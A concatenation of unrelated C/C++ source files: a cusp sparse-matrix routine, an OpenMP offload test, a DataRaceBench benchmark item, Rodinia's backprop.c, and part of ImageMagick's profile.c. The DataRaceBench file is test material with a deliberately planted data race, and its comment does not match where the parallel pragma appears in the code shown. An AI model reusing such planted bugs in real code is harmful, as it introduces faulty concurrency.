typedef typename Matrix::index_type IndexType;
typedef typename Vector2::value_type ValueType;
const IndexType num_diagonals = A.diagonal_offsets.size();
const IndexType block_size = (IndexType)A.block_size;
const IndexType num_cols = (IndexType)A.num_cols;
// make chunksize a multiple of block_size
const IndexType chunksize = block_size*(DIA_CHUNKSIZE/block_size);
// optimisation for special case
if (block_size == 2) {
#pragma omp parallel for
for (IndexType ch = 0; ch < num_cols; ch += chunksize) {
for (IndexType row = ch; row < std::min(ch+chunksize,num_cols); row+=2)
{
ValueType sum1 = initialize(y[row]);
ValueType sum2 = initialize(y[row+1]);
// for each diagonal block
for (IndexType d = 0; d < num_diagonals; d++)
{
const IndexType col = row - A.diagonal_offsets[d]*2;
if (col >= 0 && col < A.num_rows)
{
sum1 = reduce(sum1, combine(A.values(col, 2*d), x[col]));
sum2 = reduce(sum2, combine(A.values(col, 2*d+1),x[col]));
sum1 = reduce(sum1, combine(A.values(col+1, 2*d), x[col+1]));
sum2 = reduce(sum2, combine(A.values(col+1, 2*d+1),x[col+1]));
}
}
y[row] = sum1;
y[row+1] = sum2;
}
}
} else { // block_size!=2
#pragma omp parallel for
for (IndexType ch = 0; ch < num_cols; ch += chunksize) {
for (IndexType row = ch; row < std::min(ch+chunksize,num_cols); row++)
{
y[row] = initialize(y[row]);
// for each diagonal block
for (IndexType d = 0; d < num_diagonals; d++)
{
const IndexType k = A.diagonal_offsets[d]*block_size;
const IndexType col = block_size*(row/block_size) - k;
if (col >= 0 && col <= A.num_rows-block_size)
{
// for each column in block
for (IndexType i = 0; i < block_size; i++)
{
const ValueType& Aij = A.values(col+i, d*block_size+row%block_size);
const ValueType& xj = x[col + i];
y[row] = reduce(y[row], combine(Aij, xj));
}
}
} // diagonals
} // rows
} // chunks
} // block_size
}
template <typename Matrix,
typename Vector1,
typename Vector2>
void transposed_spmv_cds(const Matrix& A,
const Vector1& x,
Vector2& y)
{
typedef typename Vector2::value_type ValueType;
if (A.block_size == 1) {
transposed_spmv_dia(A, x, y,
cusp::detail::zero_function<ValueType>(),
thrust::multiplies<ValueType>(),
thrust::plus<ValueType>());
} else {
transposed_spmv_cds(A, x, y,
cusp::detail::zero_function<ValueType>(),
thrust::multiplies<ValueType>(),
thrust::plus<ValueType>());
}
}
} // end namespace host
} // end namespace detail
} // end namespace cusp
|
device_ptr_update.c | // RUN: %libomptarget-compile-generic
// RUN: env LIBOMPTARGET_DEBUG=1 %libomptarget-run-generic 2>&1 \
// RUN: | %fcheck-generic -check-prefix=DEBUG -check-prefix=CHECK
// REQUIRES: libomptarget-debug
#include <stdio.h>
struct S {
int *p;
};
int main(void) {
int A[10];
struct S s1;
s1.p = A;
// DEBUG: Update pointer ([[DEV_PTR:0x[^ ]+]]) -> {{\[}}[[DEV_OBJ_A:0x[^ ]+]]{{\]}}
#pragma omp target enter data map(alloc : s1.p [0:10])
// DEBUG-NOT: Update pointer ([[DEV_PTR]]) -> {{\[}}[[DEV_OBJ_A]]{{\]}}
#pragma omp target map(alloc : s1.p [0:10])
{
for (int i = 0; i < 10; ++i)
s1.p[i] = i;
}
#pragma omp target exit data map(from : s1.p [0:10])
int fail_A = 0;
for (int i = 0; i < 10; ++i) {
if (A[i] != i) {
fail_A = 1;
break;
}
}
// CHECK-NOT: Test A failed
if (fail_A) {
printf("Test A failed\n");
}
return fail_A;
}
|
DRB002-antidep1-var-yes.c | /*
Copyright (c) 2017, Lawrence Livermore National Security, LLC.
Produced at the Lawrence Livermore National Laboratory
Written by Chunhua Liao, Pei-Hung Lin, Joshua Asplund,
Markus Schordan, and Ian Karlin
(email: liao6@llnl.gov, lin32@llnl.gov, asplund1@llnl.gov,
schordan1@llnl.gov, karlin1@llnl.gov)
LLNL-CODE-732144
All rights reserved.
This file is part of DataRaceBench. For details, see
https://github.com/LLNL/dataracebench. Please also see the LICENSE file
for our additional BSD notice.
Redistribution and use in source and binary forms, with
or without modification, are permitted provided that the following
conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the disclaimer below.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the disclaimer (as noted below)
in the documentation and/or other materials provided with the
distribution.
* Neither the name of the LLNS/LLNL nor the names of its contributors
may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL LAWRENCE LIVERMORE NATIONAL
SECURITY, LLC, THE U.S. DEPARTMENT OF ENERGY OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
A loop with loop-carried anti-dependence.
Data race pair: a[i+1]@67:10 vs. a[i]@67:5
*/
#include <stdlib.h>
#include <stdio.h>
int main(int argc, char* argv[])
{
int i;
int len = 1000;
if (argc>1)
len = atoi(argv[1]);
int a[len];
#pragma omp parallel for private(i)
for (i=0; i<len; i++)
a[i]= i;
for (i=0;i< len -1 ;i++)
a[i]=a[i+1]+1;
for (i=0; i<len; i++)
printf("%d\n", a[i]);
return 0;
}
|
backprop.c | /*
******************************************************************
* HISTORY
* 15-Oct-94 Jeff Shufelt (js), Carnegie Mellon University
* Prepared for 15-681, Fall 1994.
* Modified by Shuai Che
******************************************************************
*/
#include <omp.h>
#include <stdio.h>
#include <stdlib.h>
#include "backprop.h"
#include <math.h>
//#define OPEN
#define ABS(x) (((x) > 0.0) ? (x) : (-(x)))
#define fastcopy(to,from,len)\
{\
register char *_to,*_from;\
register int _i,_l;\
_to = (char *)(to);\
_from = (char *)(from);\
_l = (len);\
for (_i = 0; _i < _l; _i++) *_to++ = *_from++;\
}
/*** Return random number between 0.0 and 1.0 ***/
float drnd()
{
return ((float) rand() / (float) BIGRND);
}
/*** Return random number between -1.0 and 1.0 ***/
float dpn1()
{
return ((drnd() * 2.0) - 1.0);
}
/*** The squashing function. Currently, it's a sigmoid. ***/
float squash(x)
float x;
{
float m;
//x = -x;
//m = 1 + x + x*x/2 + x*x*x/6 + x*x*x*x/24 + x*x*x*x*x/120;
//return(1.0 / (1.0 + m));
return (1.0 / (1.0 + exp(-x)));
}
/*** Allocate 1d array of floats ***/
float *alloc_1d_dbl(n)
int n;
{
float *new;
new = (float *) malloc ((unsigned) (n * sizeof (float)));
if (new == NULL) {
printf("ALLOC_1D_DBL: Couldn't allocate array of floats\n");
return (NULL);
}
return (new);
}
/*** Allocate 2d array of floats ***/
float **alloc_2d_dbl(m, n)
int m, n;
{
int i;
float **new;
new = (float **) malloc ((unsigned) (m * sizeof (float *)));
if (new == NULL) {
printf("ALLOC_2D_DBL: Couldn't allocate array of dbl ptrs\n");
return (NULL);
}
for (i = 0; i < m; i++) {
new[i] = alloc_1d_dbl(n);
}
return (new);
}
bpnn_randomize_weights(w, m, n)
float **w;
int m, n;
{
int i, j;
for (i = 0; i <= m; i++) {
for (j = 0; j <= n; j++) {
w[i][j] = (float) rand()/RAND_MAX;
// w[i][j] = dpn1();
}
}
}
bpnn_randomize_row(w, m)
float *w;
int m;
{
int i;
for (i = 0; i <= m; i++) {
//w[i] = (float) rand()/RAND_MAX;
w[i] = 0.1;
}
}
bpnn_zero_weights(w, m, n)
float **w;
int m, n;
{
int i, j;
for (i = 0; i <= m; i++) {
for (j = 0; j <= n; j++) {
w[i][j] = 0.0;
}
}
}
void bpnn_initialize(seed)
{
printf("Random number generator seed: %d\n", seed);
srand(seed);
}
BPNN *bpnn_internal_create(n_in, n_hidden, n_out)
int n_in, n_hidden, n_out;
{
BPNN *newnet;
newnet = (BPNN *) malloc (sizeof (BPNN));
if (newnet == NULL) {
printf("BPNN_CREATE: Couldn't allocate neural network\n");
return (NULL);
}
newnet->input_n = n_in;
newnet->hidden_n = n_hidden;
newnet->output_n = n_out;
newnet->input_units = alloc_1d_dbl(n_in + 1);
newnet->hidden_units = alloc_1d_dbl(n_hidden + 1);
newnet->output_units = alloc_1d_dbl(n_out + 1);
newnet->hidden_delta = alloc_1d_dbl(n_hidden + 1);
newnet->output_delta = alloc_1d_dbl(n_out + 1);
newnet->target = alloc_1d_dbl(n_out + 1);
newnet->input_weights = alloc_2d_dbl(n_in + 1, n_hidden + 1);
newnet->hidden_weights = alloc_2d_dbl(n_hidden + 1, n_out + 1);
newnet->input_prev_weights = alloc_2d_dbl(n_in + 1, n_hidden + 1);
newnet->hidden_prev_weights = alloc_2d_dbl(n_hidden + 1, n_out + 1);
return (newnet);
}
void bpnn_free(net)
BPNN *net;
{
int n1, n2, i;
n1 = net->input_n;
n2 = net->hidden_n;
free((char *) net->input_units);
free((char *) net->hidden_units);
free((char *) net->output_units);
free((char *) net->hidden_delta);
free((char *) net->output_delta);
free((char *) net->target);
for (i = 0; i <= n1; i++) {
free((char *) net->input_weights[i]);
free((char *) net->input_prev_weights[i]);
}
free((char *) net->input_weights);
free((char *) net->input_prev_weights);
for (i = 0; i <= n2; i++) {
free((char *) net->hidden_weights[i]);
free((char *) net->hidden_prev_weights[i]);
}
free((char *) net->hidden_weights);
free((char *) net->hidden_prev_weights);
free((char *) net);
}
/*** Creates a new fully-connected network from scratch,
with the given numbers of input, hidden, and output units.
Threshold units are automatically included. All weights are
randomly initialized.
Space is also allocated for temporary storage (momentum weights,
error computations, etc).
***/
BPNN *bpnn_create(n_in, n_hidden, n_out)
int n_in, n_hidden, n_out;
{
BPNN *newnet;
newnet = bpnn_internal_create(n_in, n_hidden, n_out);
#ifdef INITZERO
bpnn_zero_weights(newnet->input_weights, n_in, n_hidden);
#else
bpnn_randomize_weights(newnet->input_weights, n_in, n_hidden);
#endif
bpnn_randomize_weights(newnet->hidden_weights, n_hidden, n_out);
bpnn_zero_weights(newnet->input_prev_weights, n_in, n_hidden);
bpnn_zero_weights(newnet->hidden_prev_weights, n_hidden, n_out);
bpnn_randomize_row(newnet->target, n_out);
return (newnet);
}
void bpnn_layerforward(l1, l2, conn, n1, n2)
float *l1, *l2, **conn;
int n1, n2;
{
float sum;
int j, k;
/*** Set up thresholding unit ***/
l1[0] = 1.0;
#ifdef OPEN
omp_set_num_threads(NUM_THREAD);
#pragma omp parallel for shared(conn, n1, n2, l1) private(k, j) reduction(+: sum) schedule(static)
#endif
/*** For each unit in second layer ***/
for (j = 1; j <= n2; j++) {
/*** Compute weighted sum of its inputs ***/
sum = 0.0;
for (k = 0; k <= n1; k++) {
sum += conn[k][j] * l1[k];
}
l2[j] = squash(sum);
}
}
//extern "C"
void bpnn_output_error(delta, target, output, nj, err)
float *delta, *target, *output, *err;
int nj;
{
int j;
float o, t, errsum;
errsum = 0.0;
for (j = 1; j <= nj; j++) {
o = output[j];
t = target[j];
delta[j] = o * (1.0 - o) * (t - o);
errsum += ABS(delta[j]);
}
*err = errsum;
}
void bpnn_hidden_error(delta_h,
nh,
delta_o,
no,
who,
hidden,
err)
float *delta_h, *delta_o, *hidden, **who, *err;
int nh, no;
{
int j, k;
float h, sum, errsum;
errsum = 0.0;
for (j = 1; j <= nh; j++) {
h = hidden[j];
sum = 0.0;
for (k = 1; k <= no; k++) {
sum += delta_o[k] * who[j][k];
}
delta_h[j] = h * (1.0 - h) * sum;
errsum += ABS(delta_h[j]);
}
*err = errsum;
}
void bpnn_adjust_weights(delta, ndelta, ly, nly, w, oldw)
float *delta, *ly, **w, **oldw;
{
float new_dw;
int k, j;
ly[0] = 1.0;
//eta = 0.3;
//momentum = 0.3;
#ifdef OPEN
omp_set_num_threads(NUM_THREAD);
#pragma omp parallel for \
shared(oldw, w, delta) \
private(j, k, new_dw) \
firstprivate(ndelta, nly, momentum)
#endif
for (j = 1; j <= ndelta; j++) {
for (k = 0; k <= nly; k++) {
new_dw = ((ETA * delta[j] * ly[k]) + (MOMENTUM * oldw[k][j]));
w[k][j] += new_dw;
oldw[k][j] = new_dw;
}
}
}
void bpnn_feedforward(net)
BPNN *net;
{
int in, hid, out;
in = net->input_n;
hid = net->hidden_n;
out = net->output_n;
/*** Feed forward input activations. ***/
bpnn_layerforward(net->input_units, net->hidden_units,
net->input_weights, in, hid);
bpnn_layerforward(net->hidden_units, net->output_units,
net->hidden_weights, hid, out);
}
void bpnn_train(net, eo, eh)
BPNN *net;
float *eo, *eh;
{
int in, hid, out;
float out_err, hid_err;
in = net->input_n;
hid = net->hidden_n;
out = net->output_n;
/*** Feed forward input activations. ***/
bpnn_layerforward(net->input_units, net->hidden_units,
net->input_weights, in, hid);
bpnn_layerforward(net->hidden_units, net->output_units,
net->hidden_weights, hid, out);
/*** Compute error on output and hidden units. ***/
bpnn_output_error(net->output_delta, net->target, net->output_units,
out, &out_err);
bpnn_hidden_error(net->hidden_delta, hid, net->output_delta, out,
net->hidden_weights, net->hidden_units, &hid_err);
*eo = out_err;
*eh = hid_err;
/*** Adjust input and hidden weights. ***/
bpnn_adjust_weights(net->output_delta, out, net->hidden_units, hid,
net->hidden_weights, net->hidden_prev_weights);
bpnn_adjust_weights(net->hidden_delta, hid, net->input_units, in,
net->input_weights, net->input_prev_weights);
}
void bpnn_save(net, filename)
BPNN *net;
char *filename;
{
int n1, n2, n3, i, j, memcnt;
float dvalue, **w;
char *mem;
///add//
FILE *pFile;
pFile = fopen( filename, "w+" );
///////
/*
if ((fd = creat(filename, 0644)) == -1) {
printf("BPNN_SAVE: Cannot create '%s'\n", filename);
return;
}
*/
n1 = net->input_n; n2 = net->hidden_n; n3 = net->output_n;
printf("Saving %dx%dx%d network to '%s'\n", n1, n2, n3, filename);
//fflush(stdout);
//write(fd, (char *) &n1, sizeof(int));
//write(fd, (char *) &n2, sizeof(int));
//write(fd, (char *) &n3, sizeof(int));
fwrite( (char *) &n1 , sizeof(char), sizeof(char), pFile);
fwrite( (char *) &n2 , sizeof(char), sizeof(char), pFile);
fwrite( (char *) &n3 , sizeof(char), sizeof(char), pFile);
memcnt = 0;
w = net->input_weights;
mem = (char *) malloc ((unsigned) ((n1+1) * (n2+1) * sizeof(float)));
for (i = 0; i <= n1; i++) {
for (j = 0; j <= n2; j++) {
dvalue = w[i][j];
fastcopy(&mem[memcnt], &dvalue, sizeof(float));
memcnt += sizeof(float);
}
}
//write(fd, mem, (n1+1) * (n2+1) * sizeof(float));
fwrite( mem , (unsigned)(sizeof(float)), (unsigned) ((n1+1) * (n2+1) * sizeof(float)) , pFile);
free(mem);
memcnt = 0;
w = net->hidden_weights;
mem = (char *) malloc ((unsigned) ((n2+1) * (n3+1) * sizeof(float)));
for (i = 0; i <= n2; i++) {
for (j = 0; j <= n3; j++) {
dvalue = w[i][j];
fastcopy(&mem[memcnt], &dvalue, sizeof(float));
memcnt += sizeof(float);
}
}
//write(fd, mem, (n2+1) * (n3+1) * sizeof(float));
fwrite( mem , sizeof(float), (unsigned) ((n2+1) * (n3+1) * sizeof(float)) , pFile);
free(mem);
fclose(pFile);
return;
}
BPNN *bpnn_read(filename)
char *filename;
{
char *mem;
BPNN *new;
int fd, n1, n2, n3, i, j, memcnt;
if ((fd = open(filename, 0, 0644)) == -1) {
return (NULL);
}
printf("Reading '%s'\n", filename); //fflush(stdout);
read(fd, (char *) &n1, sizeof(int));
read(fd, (char *) &n2, sizeof(int));
read(fd, (char *) &n3, sizeof(int));
new = bpnn_internal_create(n1, n2, n3);
printf("'%s' contains a %dx%dx%d network\n", filename, n1, n2, n3);
printf("Reading input weights..."); //fflush(stdout);
memcnt = 0;
mem = (char *) malloc ((unsigned) ((n1+1) * (n2+1) * sizeof(float)));
read(fd, mem, (n1+1) * (n2+1) * sizeof(float));
for (i = 0; i <= n1; i++) {
for (j = 0; j <= n2; j++) {
fastcopy(&(new->input_weights[i][j]), &mem[memcnt], sizeof(float));
memcnt += sizeof(float);
}
}
free(mem);
printf("Done\nReading hidden weights..."); //fflush(stdout);
memcnt = 0;
mem = (char *) malloc ((unsigned) ((n2+1) * (n3+1) * sizeof(float)));
read(fd, mem, (n2+1) * (n3+1) * sizeof(float));
for (i = 0; i <= n2; i++) {
for (j = 0; j <= n3; j++) {
fastcopy(&(new->hidden_weights[i][j]), &mem[memcnt], sizeof(float));
memcnt += sizeof(float);
}
}
free(mem);
close(fd);
printf("Done\n"); //fflush(stdout);
bpnn_zero_weights(new->input_prev_weights, n1, n2);
bpnn_zero_weights(new->hidden_prev_weights, n2, n3);
return (new);
}
|
profile.c | /*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% PPPP RRRR OOO FFFFF IIIII L EEEEE %
% P P R R O O F I L E %
% PPPP RRRR O O FFF I L EEE %
% P R R O O F I L E %
% P R R OOO F IIIII LLLLL EEEEE %
% %
% %
% MagickCore Image Profile Methods %
% %
% Software Design %
% Cristy %
% July 1992 %
% %
% %
% Copyright 1999-2018 ImageMagick Studio LLC, a non-profit organization %
% dedicated to making software imaging solutions freely available. %
% %
% You may not use this file except in compliance with the License. You may %
% obtain a copy of the License at %
% %
% https://www.imagemagick.org/script/license.php %
% %
% Unless required by applicable law or agreed to in writing, software %
% distributed under the License is distributed on an "AS IS" BASIS, %
% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. %
% See the License for the specific language governing permissions and %
% limitations under the License. %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
%
*/
/*
Include declarations.
*/
#include "magick/studio.h"
#include "magick/attribute.h"
#include "magick/cache.h"
#include "magick/color.h"
#include "magick/colorspace-private.h"
#include "magick/configure.h"
#include "magick/exception.h"
#include "magick/exception-private.h"
#include "magick/hashmap.h"
#include "magick/image.h"
#include "magick/memory_.h"
#include "magick/monitor.h"
#include "magick/monitor-private.h"
#include "magick/option.h"
#include "magick/option-private.h"
#include "magick/profile.h"
#include "magick/property.h"
#include "magick/quantum.h"
#include "magick/quantum-private.h"
#include "magick/resource_.h"
#include "magick/splay-tree.h"
#include "magick/string_.h"
#include "magick/thread-private.h"
#include "magick/token.h"
#include "magick/utility.h"
#if defined(MAGICKCORE_LCMS_DELEGATE)
#if defined(MAGICKCORE_HAVE_LCMS_LCMS2_H)
#include <wchar.h>
#include <lcms/lcms2.h>
#else
#include <wchar.h>
#include "lcms2.h"
#endif
#endif
/*
Definitions
*/
#define LCMSHDRI
#if !defined(MAGICKCORE_HDRI_SUPPORT)
#if (MAGICKCORE_QUANTUM_DEPTH == 8)
#undef LCMSHDRI
#define LCMSScaleSource(pixel) ScaleQuantumToShort(pixel)
#define LCMSScaleTarget(pixel) ScaleShortToQuantum(pixel)
typedef unsigned short
LCMSType;
#elif (MAGICKCORE_QUANTUM_DEPTH == 16)
#undef LCMSHDRI
#define LCMSScaleSource(pixel) (pixel)
#define LCMSScaleTarget(pixel) (pixel)
typedef unsigned short
LCMSType;
#endif
#endif
#if defined(LCMSHDRI)
#define LCMSScaleSource(pixel) (source_scale*QuantumScale*(pixel))
#define LCMSScaleTarget(pixel) ClampToQuantum(target_scale*QuantumRange*(pixel))
typedef double
LCMSType;
#endif
/*
Forward declarations
*/
static MagickBooleanType
SetImageProfileInternal(Image *,const char *,const StringInfo *,
const MagickBooleanType);
static void
WriteTo8BimProfile(Image *,const char*,const StringInfo *);
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% C l o n e I m a g e P r o f i l e s %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% CloneImageProfiles() clones one or more image profiles.
%
% The format of the CloneImageProfiles method is:
%
% MagickBooleanType CloneImageProfiles(Image *image,
% const Image *clone_image)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o clone_image: the clone image.
%
*/
MagickExport MagickBooleanType CloneImageProfiles(Image *image,
const Image *clone_image)
{
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
assert(clone_image != (const Image *) NULL);
assert(clone_image->signature == MagickCoreSignature);
image->color_profile.length=clone_image->color_profile.length;
image->color_profile.info=clone_image->color_profile.info;
image->iptc_profile.length=clone_image->iptc_profile.length;
image->iptc_profile.info=clone_image->iptc_profile.info;
if (clone_image->profiles != (void *) NULL)
{
if (image->profiles != (void *) NULL)
DestroyImageProfiles(image);
image->profiles=CloneSplayTree((SplayTreeInfo *) clone_image->profiles,
(void *(*)(void *)) ConstantString,(void *(*)(void *)) CloneStringInfo);
}
return(MagickTrue);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% D e l e t e I m a g e P r o f i l e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% DeleteImageProfile() deletes a profile from the image by its name.
%
% The format of the DeleteImageProfile method is:
%
% MagickBooleanTyupe DeleteImageProfile(Image *image,const char *name)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o name: the profile name.
%
*/
MagickExport MagickBooleanType DeleteImageProfile(Image *image,const char *name)
{
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
if (image->profiles == (SplayTreeInfo *) NULL)
return(MagickFalse);
if (LocaleCompare(name,"icc") == 0)
{
/*
Continue to support deprecated color profile for now.
*/
image->color_profile.length=0;
image->color_profile.info=(unsigned char *) NULL;
}
if (LocaleCompare(name,"iptc") == 0)
{
/*
Continue to support deprecated IPTC profile for now.
*/
image->iptc_profile.length=0;
image->iptc_profile.info=(unsigned char *) NULL;
}
WriteTo8BimProfile(image,name,(StringInfo *) NULL);
return(DeleteNodeFromSplayTree((SplayTreeInfo *) image->profiles,name));
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% D e s t r o y I m a g e P r o f i l e s %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% DestroyImageProfiles() releases memory associated with an image profile map.
%
% The format of the DestroyProfiles method is:
%
% void DestroyImageProfiles(Image *image)
%
% A description of each parameter follows:
%
% o image: the image.
%
*/
MagickExport void DestroyImageProfiles(Image *image)
{
if (image->profiles != (SplayTreeInfo *) NULL)
image->profiles=DestroySplayTree((SplayTreeInfo *) image->profiles);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% G e t I m a g e P r o f i l e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% GetImageProfile() gets a profile associated with an image by name.
%
% The format of the GetImageProfile method is:
%
% const StringInfo *GetImageProfile(const Image *image,const char *name)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o name: the profile name.
%
*/
MagickExport const StringInfo *GetImageProfile(const Image *image,
const char *name)
{
const StringInfo
*profile;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
if (image->profiles == (SplayTreeInfo *) NULL)
return((StringInfo *) NULL);
profile=(const StringInfo *) GetValueFromSplayTree((SplayTreeInfo *)
image->profiles,name);
return(profile);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% G e t N e x t I m a g e P r o f i l e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% GetNextImageProfile() gets the next profile name for an image.
%
% The format of the GetNextImageProfile method is:
%
% char *GetNextImageProfile(const Image *image)
%
% A description of each parameter follows:
%
% o hash_info: the hash info.
%
*/
MagickExport char *GetNextImageProfile(const Image *image)
{
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
if (image->profiles == (SplayTreeInfo *) NULL)
return((char *) NULL);
return((char *) GetNextKeyInSplayTree((SplayTreeInfo *) image->profiles));
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% P r o f i l e I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ProfileImage() associates, applies, or removes an ICM, IPTC, or generic
% profile with / to / from an image. If the profile is NULL, it is removed
% from the image otherwise added or applied. Use a name of '*' and a profile
% of NULL to remove all profiles from the image.
%
% ICC and ICM profiles are handled as follows: If the image does not have
% an associated color profile, the one you provide is associated with the
% image and the image pixels are not transformed. Otherwise, the colorspace
% transform defined by the existing and new profile are applied to the image
% pixels and the new profile is associated with the image.
%
% The format of the ProfileImage method is:
%
% MagickBooleanType ProfileImage(Image *image,const char *name,
% const void *datum,const size_t length,const MagickBooleanType clone)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o name: Name of profile to add or remove: ICC, IPTC, or generic profile.
%
% o datum: the profile data.
%
% o length: the length of the profile.
%
% o clone: should be MagickFalse.
%
*/
#if defined(MAGICKCORE_LCMS_DELEGATE)
static LCMSType **DestroyPixelThreadSet(LCMSType **pixels)
{
register ssize_t
i;
if (pixels == (LCMSType **) NULL)
return((LCMSType **) NULL);
for (i=0; i < (ssize_t) GetMagickResourceLimit(ThreadResource); i++)
if (pixels[i] != (LCMSType *) NULL)
pixels[i]=(LCMSType *) RelinquishMagickMemory(pixels[i]);
pixels=(LCMSType **) RelinquishMagickMemory(pixels);
return(pixels);
}
static LCMSType **AcquirePixelThreadSet(const size_t columns,
const size_t channels)
{
LCMSType
**pixels;
register ssize_t
i;
size_t
number_threads;
number_threads=(size_t) GetMagickResourceLimit(ThreadResource);
pixels=(LCMSType **) AcquireQuantumMemory(number_threads,sizeof(*pixels));
if (pixels == (LCMSType **) NULL)
return((LCMSType **) NULL);
(void) memset(pixels,0,number_threads*sizeof(*pixels));
for (i=0; i < (ssize_t) number_threads; i++)
{
pixels[i]=(LCMSType *) AcquireQuantumMemory(columns,channels*
sizeof(**pixels));
if (pixels[i] == (LCMSType *) NULL)
return(DestroyPixelThreadSet(pixels));
}
return(pixels);
}
static cmsHTRANSFORM *DestroyTransformThreadSet(cmsHTRANSFORM *transform)
{
register ssize_t
i;
assert(transform != (cmsHTRANSFORM *) NULL);
for (i=0; i < (ssize_t) GetMagickResourceLimit(ThreadResource); i++)
if (transform[i] != (cmsHTRANSFORM) NULL)
cmsDeleteTransform(transform[i]);
transform=(cmsHTRANSFORM *) RelinquishMagickMemory(transform);
return(transform);
}
static cmsHTRANSFORM *AcquireTransformThreadSet(Image *image,
const cmsHPROFILE source_profile,const cmsUInt32Number source_type,
const cmsHPROFILE target_profile,const cmsUInt32Number target_type,
const int intent,const cmsUInt32Number flags)
{
cmsHTRANSFORM
*transform;
register ssize_t
i;
size_t
number_threads;
number_threads=(size_t) GetMagickResourceLimit(ThreadResource);
transform=(cmsHTRANSFORM *) AcquireQuantumMemory(number_threads,
sizeof(*transform));
if (transform == (cmsHTRANSFORM *) NULL)
return((cmsHTRANSFORM *) NULL);
(void) memset(transform,0,number_threads*sizeof(*transform));
for (i=0; i < (ssize_t) number_threads; i++)
{
transform[i]=cmsCreateTransformTHR((cmsContext) image,source_profile,
source_type,target_profile,target_type,intent,flags);
if (transform[i] == (cmsHTRANSFORM) NULL)
return(DestroyTransformThreadSet(transform));
}
return(transform);
}
#endif
#if defined(MAGICKCORE_LCMS_DELEGATE)
static void LCMSExceptionHandler(cmsContext context,cmsUInt32Number severity,
const char *message)
{
Image
*image;
(void) LogMagickEvent(TransformEvent,GetMagickModule(),"lcms: #%u, %s",
severity,message != (char *) NULL ? message : "no message");
image=(Image *) context;
if (image != (Image *) NULL)
(void) ThrowMagickException(&image->exception,GetMagickModule(),
ImageWarning,"UnableToTransformColorspace","`%s'",image->filename);
}
#endif
